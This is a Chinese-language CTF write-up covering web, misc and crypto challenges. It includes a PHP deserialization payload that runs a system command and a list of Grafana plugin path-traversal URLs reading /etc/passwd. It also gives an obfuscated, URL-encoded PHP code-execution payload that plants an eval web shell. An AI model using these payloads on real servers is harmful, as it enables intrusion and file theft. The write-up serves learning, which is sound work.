web
1.baby开胃菜
题目地址
查看源码发现
然后搜索 flag ,找不到啥有用信息
往下查看,发现
找到跳转
或者
尝试admin admin登录
显然失败了
然后查看源码
用burpsuite一个一个尝试
然后发过去就得到flag了
2.babyunser
题目地址
很显然的php反序列化
需要fast为true时才能调用run函数
而preg_match()把fast过滤了,所以需要反序列化时绕过wakeup函数
即将变量数加1,就能绕过wakeup函数
即:O:4:“hack”:1:{s:4:“fast”;b:1;}
改为:O:4:“hack”:2:{s:4:“fast”;b:1;}
<?php
highlight_file(__FILE__);
class cwm
{
public $a="cat";
public $b="";
public $booll;
}
class hack
{
public $fast=true;
}
$a=new cwm();
$a->booll=new hack();
$a=serialize($a);
echo $a;
// O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":1:{s:4:"fast";b:1;}}
// O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}
//O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}
//最终payload
//?NEUQCSA=O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:9:"cat /flag";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}
?>
3.babycve(复现)
此处需注意flag在根目录,然后我们应该去读取 /敏感文件名
!!!当然这也是我的错误原因。。
一直读/ 然后没权限然后就没了
首先,cve即通用漏洞纰漏,显然去查呗!
搜索grafana cve
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
最终用burpsuite,整出来
最后再说一句,读/目标文件 …
4.babyrce(复现)
这个rce过滤的是真的狠
这里整个美美的网址,辅助正则表达式
正则表达式在线测试,菜鸟工具
好吧,我就是菜鸟!!
用 $ . _ [] () ; 数字0-9 来构造
emmm,我错到哪里了呢?
我不会构造一个字母,或者说不太会
还有因为+号在url中会当成空格 , 所以最后的payload还需要urlencode一次
让我自己的浏览器解析我的payload时,别把+当成空格
错误的:
$__.=($_.[])[3];
var_dump($__); //a
为什么会这样呢
var_dump($_);
//NULL
$_.=[];
var_dump($_);
//string(5) "Array"
然而eval执行时上面过不去了
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
所以正确的得到一个字母:
$_=[];
$_.=$_;
var_dump($_);
//string(10) "ArrayArray"
然后就是利用字母来构造payload了
此处有小技巧:先构造一个chr
然后利用chr函数来得到字母 例如chr(65) -> A
$_=[];
$_.=$_;
$_3=$_[1];
$_=$_[3];
$_++;
$_++;
$_1=$_;
$_++;
$_++;
$_++;
$_++;
$_++;
$_2=$_;
var_dump($_1.$_2.$_3);
//string(3) "chr"
大佬博客:变量函数
构造payload:
?rce=assert[$_GET[‘a’]];&a=eval( $_POST[%27cmd%27])
rce=%24_%3D%5B%5D%3B%24_.%3D%24_%3B%24_%3D%24_%5B0%5D%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24_1%3D%24___%3B%24_3%3D%24_1%2865%29%3B%24_3.%3D%24_1%2883%29%3B%24_3.%3D%24_1%2883%29%3B%24_3.%3D%24_1%2869%29%3B%24_3.%3D%24_1%2882%29%3B%24_3.%3D%24_1%2884%29%3B%24_2%3D%24_1%2895%29%3B%24_2.%3D%24_1%2871%29%3B%24_2.%3D%24_1%2869%29%3B%24_2.%3D%24_1%2884%29%3B%24_2%3D%24%24_2%3B%24_3%28%24_2%5B%24_1%2897%29%5D%29%3B&a=eval($_POST[%27cmd%27])
863个字符 还行
然后使用antsword去连接就行了
misc
1.Signin
就给了张图片
然后
先看图片信息,没有
之后在winhex里也啥也没发现
然后改了宽高也不行
再用binwalk
也没发现隐藏有文件
最后用Stegsolve.jar(反正jdk1.8不行)工具
javaw -jar D:\CTF-Tools\Stegsolve.jar
用其Data Extract功能
发现LSB隐写
flag{w3l c0m3_t0_NEUQCSA! !}
最后得到flag后需去除空格后提交,即:
flag{w3lc0m3_t0_NEUQCSA!!}
2.iii_puzzle (复现)
给了256张图片,显然要拼图
用了
montage
gaps
整不出来
找拼图网站
拼图网站
最后是这样的:
16*16
每16张拼成横的
最后在合并
基本可以拼出来。。
然后去搜索了一下
条码类型
pdf 417
又找了个网站解析:
在线阅读pdf417
最后的最后:
这居然是base85编码?
Crypto
1.easy_RSA
低加密指数广播攻击(模数n、密文c不同,明文m、加密指数e相同)
百度了个脚本,把相应的n c 填进去
from gmpy2 import*
from Crypto.Util.number import*
from libnum import*
n1 = 99189590166797232086720980208396149145032434547157551749365685838243060096448779091791572975301913921989329359184771608887116503472004506156142409801072181723546939535133722634489479994529784315168828449203195148297729506864324569621412338216695262998675758819785818629225029964223785112715167603547994360609
n2 = 135431840186992180271858139761915626767751108603094107204397031326971439333697039026880373357031205070745565422848119633065831765028879556819138470835686890708601443126670396329313419801430432743829592927357587241703853883024899325883439786965817326936380880482088194276553234984011362490804054479032421439909
n3 = 157898945136154988968481764581371877763476832720021570935316682152828796062857138215008992476683694791253067903453617872812801176924017309834290645076768458268371025127436335007531745742325085054016448480033371383592313602941393621000501168909222100250956154249497572570242803660984747191373558068515671388437
c1 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
c2 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
c3 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
e=3
def CRT(a,n):
sum = 0
N = reduce (lambda x,y:x*y,n) # ni 的乘积,N=n1*n2*n3
for n_i, a_i in zip(n,a): # zip()将对象打包成元组
N_i = N // n_i #Mi=M/ni
sum += a_i*N_i*invert(N_i,n_i) #sum=C1M1y1+C2M2y2+C3M3y3
return sum % N
n =[n1,n2,n3]
c =[c1,c2,c3]
x = CRT(c,n)
m = iroot(x,e)[0]
print(m)
a=n2s(m)
printf(a)
print(n2s(m))
然后发现有点问题,
就只输出到m算了
然后把十进制数m 转变为16进制数
再转变为字符串
得到flag